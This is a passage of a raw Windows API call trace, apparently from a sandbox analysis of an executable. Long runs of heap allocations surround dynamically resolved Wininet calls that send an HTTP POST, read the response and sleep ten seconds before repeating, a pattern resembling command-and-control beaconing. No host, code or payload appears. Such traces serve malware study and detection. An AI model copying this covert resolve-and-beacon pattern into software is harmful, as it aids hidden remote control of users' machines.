dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0169.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0169.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0169.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0169.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0169.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0169.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0169.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4690 [0169.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0169.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f46f0 [0169.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4690 | out: hHeap=0x4780000) returned 1 [0169.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798af0 [0169.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f46f0 | out: hHeap=0x4780000) returned 1 [0169.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f4690 [0169.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9848 [0169.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9848 | out: hHeap=0x4780000) returned 1 [0169.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798af0 | out: hHeap=0x4780000) returned 1 [0169.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9848 [0169.811] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0169.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0169.811] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce660 [0169.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0169.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0169.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce660 | out: hHeap=0x4780000) returned 1 [0169.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0169.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0169.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce580 [0169.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0169.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f46f0 [0169.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce580 | out: hHeap=0x4780000) returned 1 [0169.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4708 [0169.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f46f0 | out: hHeap=0x4780000) returned 1 [0169.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x4798af0 [0169.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0169.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f4750 [0169.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9870 [0169.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9870 | out: hHeap=0x4780000) returned 1 [0169.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4798af0 | out: hHeap=0x4780000) returned 1 [0169.812] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0169.813] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0169.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce660 [0169.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0169.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0169.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce660 | out: hHeap=0x4780000) returned 1 [0169.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce660 [0169.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0169.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0169.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce660 | out: hHeap=0x4780000) returned 1 [0169.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47ba3e0 [0169.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0169.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47ba440 [0169.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba3e0 | out: hHeap=0x4780000) returned 1 [0169.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47dea98 [0169.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba440 | out: hHeap=0x4780000) returned 1 [0169.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9870 [0169.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47dea98 | out: hHeap=0x4780000) returned 1 [0169.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0169.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9870 | out: hHeap=0x4780000) returned 1 [0169.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9870 [0169.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0169.814] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9898 [0169.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0169.815] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0169.815] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0169.815] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0169.815] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9898 | out: hHeap=0x4780000) returned 1 [0169.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0169.815] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0169.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce660 [0169.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0169.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce660 | out: hHeap=0x4780000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0169.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47ba3e0 [0169.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47ba440 [0169.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba3e0 | out: hHeap=0x4780000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x47dea98 [0169.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba440 | out: hHeap=0x4780000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9898 [0169.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47dea98 | out: hHeap=0x4780000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbeb8 [0169.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9898 | out: hHeap=0x4780000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9898 [0169.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb9b0 [0169.816] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9f28 [0169.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb9b0 | out: hHeap=0x4780000) returned 1 [0169.817] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbeb8 | out: hHeap=0x4780000) returned 1 [0169.817] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0169.817] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="", dwHeadersLength=0x0, lpOptional=0x68ab421f*, dwOptionalLength=0x0) returned 1 [0169.946] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9f28 | out: hHeap=0x4780000) returned 1 [0169.946] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0169.946] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce660 [0169.947] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0169.947] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0169.947] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5d0 [0169.947] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0169.947] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0169.947] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5d0 | out: hHeap=0x4780000) returned 1 [0169.947] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0169.947] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0169.947] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0169.947] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0169.947] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47ba440 [0169.947] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0169.947] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47ba470 [0169.947] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba440 | out: hHeap=0x4780000) returned 1 [0169.947] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4b0 [0169.947] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba470 | out: hHeap=0x4780000) returned 1 [0169.947] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9fa0 [0169.947] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4b0 | out: hHeap=0x4780000) returned 1 [0169.947] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcc0 [0169.948] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9fa0 | out: hHeap=0x4780000) returned 1 [0169.948] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9eb0 [0169.954] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0169.954] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9dc0 [0169.955] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0169.955] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcc0 | out: hHeap=0x4780000) returned 1 [0169.955] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0169.955] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x400) returned 1 [0169.956] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9dc0 | out: hHeap=0x4780000) returned 1 [0169.956] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x410) returned 0x47f10e8 [0169.956] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x810) returned 0x480c710 [0169.956] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480c710 | out: hHeap=0x4780000) returned 1 [0169.957] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f10e8 | out: hHeap=0x4780000) returned 1 [0169.957] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0169.957] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0169.957] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0169.957] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0169.957] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0169.957] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0169.957] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0169.957] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0169.957] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0169.957] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0169.957] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47ba440 [0169.957] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0169.957] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47ba470 [0169.957] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba440 | out: hHeap=0x4780000) returned 1 [0169.957] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0169.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba470 | out: hHeap=0x4780000) returned 1 [0169.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9e88 [0169.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0169.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcc0 [0169.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9e88 | out: hHeap=0x4780000) returned 1 [0169.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9e88 [0169.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0169.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9dc0 [0169.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0169.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcc0 | out: hHeap=0x4780000) returned 1 [0169.959] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0169.959] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x235) returned 1 [0169.959] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9dc0 | out: hHeap=0x4780000) returned 1 [0169.959] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x240) returned 0x47f10e8 [0169.959] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x470) returned 0x47f1330 [0169.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f1330 | out: hHeap=0x4780000) returned 1 [0169.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f10e8 | out: hHeap=0x4780000) returned 1 [0169.960] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0169.960] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0169.960] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0169.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0169.960] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce720 [0169.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0169.960] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0169.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce720 | out: hHeap=0x4780000) returned 1 [0169.960] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0169.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0169.960] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47ba440 [0169.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0169.960] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47ba470 [0169.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba440 | out: hHeap=0x4780000) returned 1 [0169.960] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b630 [0169.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba470 | out: hHeap=0x4780000) returned 1 [0169.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9fa0 [0169.961] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b630 | out: hHeap=0x4780000) returned 1 [0169.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbda0 [0169.961] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9fa0 | out: hHeap=0x4780000) returned 1 [0169.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9f28 [0169.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbb38 [0169.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9d48 [0169.961] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbb38 | out: hHeap=0x4780000) returned 1 [0169.961] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0169.961] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0169.961] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0169.962] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9d48 | out: hHeap=0x4780000) returned 1 [0169.962] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0169.962] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0169.962] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0169.962] FreeLibrary (hLibModule=0x71570000) returned 1 [0169.962] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce660 | out: hHeap=0x4780000) returned 1 [0169.962] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0169.963] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9848 | out: hHeap=0x4780000) returned 1 [0169.963] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9bb8 | out: hHeap=0x4780000) returned 1 [0169.963] Sleep (dwMilliseconds=0x2710) [0170.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0170.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0170.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0170.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0170.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0170.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0170.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0170.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0170.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0170.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47ba440 [0170.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0170.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47ba470 [0170.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba440 | out: hHeap=0x4780000) returned 1 [0170.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b510 [0170.009] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba470 | out: hHeap=0x4780000) returned 1 [0170.009] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47ba440 [0170.010] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9848 [0170.010] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9848 | out: hHeap=0x4780000) returned 1 [0170.010] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b510 | out: hHeap=0x4780000) returned 1 [0170.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x60) returned 0x47d2c10 [0170.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47a3290 | out: hHeap=0x4780000) returned 1 [0170.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0170.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0170.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0170.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0170.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0170.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce720 [0170.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0170.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0170.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce720 | out: hHeap=0x4780000) returned 1 [0170.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47ba470 [0170.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0170.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f46f0 [0170.023] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ba470 | out: hHeap=0x4780000) returned 1 [0170.023] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4f0 [0170.023] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f46f0 | out: hHeap=0x4780000) returned 1 [0170.023] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47f9bb8 [0170.023] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4f0 | out: hHeap=0x4780000) returned 1 [0170.023] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0170.023] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9bb8 | out: hHeap=0x4780000) returned 1 [0170.023] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9848 [0170.023] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe10 [0170.023] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9bb8 [0170.023] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe10 | out: hHeap=0x4780000) returned 1 [0170.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0170.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0170.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0170.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0170.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0170.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0170.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, 